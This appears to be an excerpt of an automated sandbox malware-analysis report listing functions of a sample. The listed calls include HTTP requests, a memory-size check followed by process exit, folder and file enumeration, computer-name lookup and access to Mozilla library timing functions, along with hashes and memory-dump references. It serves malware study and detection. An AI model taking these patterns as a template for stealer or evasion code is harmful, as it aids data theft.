Part of subcall function 003A6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003A6335
Part of subcall function 003A6280: HttpOpenRequestA.WININET(00000000,GET,?,00F3E630,00000000,00000000,00400100,00000000), ref: 003A6385
Part of subcall function 003A6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003A63BF
Part of subcall function 003A6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003A63D1

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003B5228

Strings

ERROR, xrefs: 003B521A
ERROR, xrefs: 003B5273

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: e24067b9bd7ade52dc94baa65d0b3f56d8ebb8006376e69cd77791c9bd1c477c
Instruction ID: 1ac0a693617b082496d1d1ef629c588720fffcfba934cb6d7ef4b6b6d9b77a39
Opcode Fuzzy Hash: e24067b9bd7ade52dc94baa65d0b3f56d8ebb8006376e69cd77791c9bd1c477c
Instruction Fuzzy Hash: E3112E30900948BBCB16FFA0DD52AED7778AF50304F404558FA1A9E992EF30AB05D791

Function 003A1220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 003A123E
ExitProcess.KERNEL32 ref: 003A1294

Strings

@, xrefs: 003A1233

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 803317263-2766056989
Opcode ID: 4ca058f6a47bed722bf009b89b429d5002bfcc83624ff175fdcbb7d1bc0df63c
Instruction ID: 74d148193d41a1ff275ce5582ad4774ff4c61ac4f9480146baba02052c47d38c
Opcode Fuzzy Hash: 4ca058f6a47bed722bf009b89b429d5002bfcc83624ff175fdcbb7d1bc0df63c
Instruction Fuzzy Hash: EB016DB0D40308BAEF10DBE4DC89B9EBB78EB15705F248458F705BA2C0D7B4A5458799

Function 003B4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003B8E0B

lstrcat.KERNEL32(?,00000000), ref: 003B4F7A
lstrcat.KERNEL32(?,003C1070), ref: 003B4F97
lstrcat.KERNEL32(?,00F38848), ref: 003B4FAB
lstrcat.KERNEL32(?,003C1074), ref: 003B4FBD

Part of subcall function 003B4910: wsprintfA.USER32 ref: 003B492C
Part of subcall function 003B4910: FindFirstFileA.KERNEL32(?,?), ref: 003B4943

Part of subcall function 003B4910: StrCmpCA.SHLWAPI(?,003C0FDC), ref: 003B4971
Part of subcall function 003B4910: StrCmpCA.SHLWAPI(?,003C0FE0), ref: 003B4987
Part of subcall function 003B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003B4B7D
Part of subcall function 003B4910: FindClose.KERNEL32(000000FF), ref: 003B4B92

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: e1666c8bedc6d5fa9c572fe1fc78d9423437dd0ae04bf0b3ccbc16dde727763a
Instruction ID: 4ea5f751d626c994061324cdd68410f8c41fbd52afe943a43c7806290ff440a7
Opcode Fuzzy Hash: e1666c8bedc6d5fa9c572fe1fc78d9423437dd0ae04bf0b3ccbc16dde727763a
Instruction Fuzzy Hash: B621CB7B90020867CB59F7B0DC86EE9337CAB55300F004548B6899A581EE74AACDDB92

Function 003B0740 Relevance: 4.7, APIs: 3, Instructions: 217COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00F38908), ref: 003B079A
StrCmpCA.SHLWAPI(00000000,00F38928), ref: 003B0866
StrCmpCA.SHLWAPI(00000000,00F387F8), ref: 003B099D

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: e029afff5ac04f746f60fdd5f72a58a700a3e947ec96cd8ff1ab4daf8251d9bb
Instruction ID: 1a5e032b85776f0b1b8e614a62bc0e99852534eae19f0b67c55d7f09b70d7f7c
Opcode Fuzzy Hash: e029afff5ac04f746f60fdd5f72a58a700a3e947ec96cd8ff1ab4daf8251d9bb
Instruction Fuzzy Hash: DD919B75A10608AFCB29EF64D992FED77B5FF95304F408518E9099F241DF30AA05CB92

Function 003B0765 Relevance: 4.7, APIs: 3, Instructions: 197COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00F38908), ref: 003B079A
StrCmpCA.SHLWAPI(00000000,00F38928), ref: 003B0866
StrCmpCA.SHLWAPI(00000000,00F387F8), ref: 003B099D

Part of subcall function 003BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003BA7E6

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID:
API String ID: 3722407311-0
Opcode ID: 65f1569d3e9442738e067b32fc5b0de92b9916a94355ec7d65e29f96a682a9fc
Instruction ID: 2fde69fe7692bd30bd167649911f8fa282411b6312043d476a4f71f1be59245d
Opcode Fuzzy Hash: 65f1569d3e9442738e067b32fc5b0de92b9916a94355ec7d65e29f96a682a9fc
Instruction Fuzzy Hash: 1A81A775B10608AFCB28EF64C992EEDB7B5FF94304F508518E9099F241DB30AA05CB82

Function 003B78E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B7910
RtlAllocateHeap.NTDLL(00000000), ref: 003B7917
GetComputerNameA.KERNEL32(?,00000104), ref: 003B792F

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateComputerNameProcess
String ID:
API String ID: 1664310425-0
Opcode ID: 469ca4cc692277eda74c8b05d7b9742f09dc403ee90781ea46cab16477e176e6
Instruction ID: a9521e12522b7b7821c2a17bf3358c7ce742c187ea399496d3572c82fbe06bfc
Opcode Fuzzy Hash: 469ca4cc692277eda74c8b05d7b9742f09dc403ee90781ea46cab16477e176e6
Instruction Fuzzy Hash: 200186B1908244EBC714DF98DD45BAABBBCF744B15F104219F645E7680D77459048BA1

Function 6CC93060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON

Download Yara Rule

APIs

?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6CC93095

Part of subcall function 6CC935A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6CD1F688,00001000), ref: 6CC935D5
Part of subcall function 6CC935A0: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6CC935E0
Part of subcall function 6CC935A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6CC935FD
Part of subcall function 6CC935A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6CC9363F
Part of subcall function 6CC935A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6CC9369F
Part of subcall function 6CC935A0: __aulldiv.LIBCMT ref: 6CC936E4

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC9309F

Part of subcall function 6CCB5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6CCB56EE,?,00000001), ref: 6CCB5B85
Part of subcall function 6CCB5B50: EnterCriticalSection.KERNEL32(6CD1F688,?,?,?,6CCB56EE,?,00000001), ref: 6CCB5B90
Part of subcall function 6CCB5B50: LeaveCriticalSection.KERNEL32(6CD1F688,?,?,?,6CCB56EE,?,00000001), ref: 6CCB5BD8
Part of subcall function 6CCB5B50: GetTickCount64.KERNEL32 ref: 6CCB5BE4

?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6CC930BE

Part of subcall function 6CC930F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6CC93127
Part of subcall function 6CC930F0: __aulldiv.LIBCMT ref: 6CC93140

Part of subcall function 6CCCAB2A: __onexit.LIBCMT ref: 6CCCAB30

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
String ID:
API String ID: 4291168024-0
Opcode ID: ac3b569d14abd20c0cde0b94dae438ea0dad17346ad476c2c748b59b0ab57418
Instruction ID: 6f10ce29fa1f7e12e8c2939ddc379d06d6307481fc2f25bc512923b16e30a802
Opcode Fuzzy Hash: ac3b569d14abd20c0cde0b94dae438ea0dad17346ad476c2c748b59b0ab57418
Instruction Fuzzy Hash: F9F02D22E2074897DB10DF7488522E67378AF6B114F101319E95C63D21FF3061DAC3C2

Function 003B9470 Relevance: 4.5, APIs: 3, Instructions: 29COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,?), ref: 003B9484
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 003B94A5
CloseHandle.KERNEL32(00000000), ref: 003B94AF

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: CloseFileHandleModuleNameOpenProcess
String ID:
API String ID: 3183270410-0
